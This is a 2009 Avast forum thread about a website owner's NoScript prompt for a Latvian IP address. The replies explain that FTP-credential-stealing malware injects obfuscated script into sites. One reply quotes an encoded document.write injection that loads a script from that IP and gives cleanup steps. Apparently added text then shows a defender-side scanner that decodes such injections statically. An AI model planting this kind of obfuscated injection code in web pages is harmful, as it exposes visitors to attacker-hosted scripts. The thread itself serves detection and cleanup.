Avast WEBforum

Business Products => Archive (Legacy) => Avast Business => Avast Server Protection => Topic started by: avastment on April 17, 2009, 07:55:36 AM

Title: 94.247.2.195
Post by: avastment on April 17, 2009, 07:55:36 AM
I have a website with a number of pages, and using NoScript I get a pop-up asking me if I want to allow or not allow 94.247.2.195.

The above URL is in Latvia.

I contacted NoScript, but I thought I'd ask here too.

Thanks
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 09:00:24 AM
I ran Malwarebytes and it found a virus in my Windows folder, removed it, rebooted, and the problem still exists.

It could be coming from Statcounter on my home page only.

http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2005-05/0105.html

I wrote to Statcounter to see what they say.
Title: Re: 94.247.2.195
Post by: Tarq57 on April 17, 2009, 12:37:51 PM
What's the chance of seeing that scan report with the malware names/paths shown?
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 03:57:56 PM
There is a good chance; see below. Also, it is another day here in Los Angeles at 7am. I checked one of my web pages that has no script and got the same pop-up from NoScript asking me if I wanted to allow or not 94.247.2.195.

Good luck with the below if it helps, and thanks for having a look.

Malwarebytes' Anti-Malware 1.35
Database version: 1904
Windows 5.1.2600 Service Pack 3

4/16/2009 11:31:23 PM
mbam-log-2009-04-16 (23-31-23).txt

Scan type: Quick Scan
Objects scanned: 83633
Time elapsed: 6 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 05:19:00 PM
I found the link below, and 94.247.2.195 is on the list shown.

http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=4024
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 05:22:44 PM
I found this.

http://blog.scansafe.com/

Now how do I remove 94.247.2.195?
Title: Re: 94.247.2.195
Post by: DavidR on April 17, 2009, 06:09:11 PM
In short, you can't.

You said that it is NoScript that blocks this, so a) it is already doing its job, and b) the script is on a web page, your web page(s) ("I have a website with a number of pages") that you haven't given, so we can't investigate what script it is.
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 09:14:02 PM
I only have a script, using Statcounter, on the main index.html page. All others with links from the main page have no script.
Yes, I wrote to Statcounter. No answer yet.
Title: Re: 94.247.2.195
Post by: DavidR on April 17, 2009, 09:28:56 PM
Which still doesn't say what the URL is.

Switch to another stat counter; it isn't the only option out there, certainly until this Statcounter vulnerability is closed.
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 11:56:02 PM
After searching and searching for a solution, I went back and reviewed the NoScript options popup:
allow
distrust and
temporary.

I clicked on distrust, and now NoScript does not pop up asking me to allow, temporary or distrust. Kind of a simple fix.

94.247.2.195 could be somewhere in my computer; however, it could be that NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.

Thanks.
Title: Re: 94.247.2.195
Post by: Tarq57 on April 18, 2009, 12:04:20 AM
Quote
94.247.2.195 could be somewhere in my computer; however, it could be that NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.
I believe the answer is the second option.
The address won't be in your computer, unless you've bookmarked it.
What you've instructed NoScript to do is exactly how it should be used.
Title: Re: 94.247.2.195
Post by: DavidR on April 18, 2009, 01:26:44 AM
It can't be in your computer, or NoScript wouldn't be detecting it (see below). You open a page, and NoScript by default should block all scripts unless you specifically allow them. Now you have NoScript set up to constantly ask you if it is OK to run x script (Options, Notifications, Show message about blocked scripts); this would drive me bonkers, and I have it disabled.

####
Unless there is malware on your system that is opening a web page in your browser (and that doesn't seem to be the case), then NoScript shouldn't have cause to notify you.
Title: Re: 94.247.2.195
Post by: WeWatchYourWebsite on April 21, 2009, 11:08:48 PM
We've been seeing a lot of these types of hacks lately.

It's usually caused by a virus on the computer that uploads to the website. The virus monitors FTP traffic, and since FTP usernames and passwords are sent in plain text, it can read them and then log in to your website as you and add their malicious code.

You might look for something like the following on your website:

<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
 --></script>

The actual encoded characters might be somewhat different, but this code actually deobfuscates to:

<script src=//94.247.2.195/jquery.js></script>

Which is what you're claiming is being blocked.

Step 1: Change the FTP password for your site.
Step 2: Clean your computer with Avast.
Step 3: Remove the JavaScript code from your web pages. It's typically in many spots on the same web page and on multiple pages.

After changing your FTP password do not upload to your site again until you've cleaned your PC.

If you have any further questions, please PM me.
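For Step 3, a webmaster has to find every copy of the injected document.write(unescape(...).replace(...)) block in the saved page source and know what it resolves to without ever running it. The scanner below is an added example, not code from the forum post or any product: it locates that pattern, replays the unescape and junk-token removal itself, and reports the decoded tag and the host it loads from; the sample HTML is constructed here around the snippet quoted above.

```javascript
// Added example: defender-side scanner for the document.write(unescape('...')
// .replace(/junk|tokens/g,"")) injection pattern shown in the post. It recovers
// the decoded markup statically; nothing from the page is executed.
const INJECT_RE =
  /document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\.replace\(\s*\/([^\/]+)\/g\s*,\s*(?:""|'')\s*\)\s*\)/g;

// Equivalent of the legacy unescape(): only %uXXXX and %XX sequences are decoded.
function legacyUnescape(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// One finding per injection: byte offset in the file, the decoded markup,
// and the script src / host it points at (null if the decoded text has none).
function scanForInjections(html) {
  const findings = [];
  for (const m of html.matchAll(INJECT_RE)) {
    // m[2] is the alternation the attacker's own .replace() used (e.g. T8A|Wk|...),
    // so reusing it as a regex reproduces exactly what the browser would strip.
    const decoded = legacyUnescape(m[1]).replace(new RegExp(m[2], 'g'), '');
    const src = decoded.match(/<script[^>]*\ssrc=["']?([^"'\s>]+)/i);
    findings.push({
      offset: m.index,
      decoded,
      src: src ? src[1] : null,
      host: src ? src[1].replace(/^(https?:)?\/\//, '').split('/')[0] : null,
    });
  }
  return findings;
}

// Constructed sample page source containing the snippet quoted in the post.
const SAMPLE_HTML = `<html><body><p>hello</p>
<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
 --></script>
</body></html>`;

// Usage: run over each saved .html/.php file and review the reported hosts.
console.log(JSON.stringify(scanForInjections(SAMPLE_HTML), null, 2));
```

Any host it reports that you did not put on your own pages is a copy that needs removing; a file with zero findings can still carry other injection styles, so this is a first pass, not proof the page is clean.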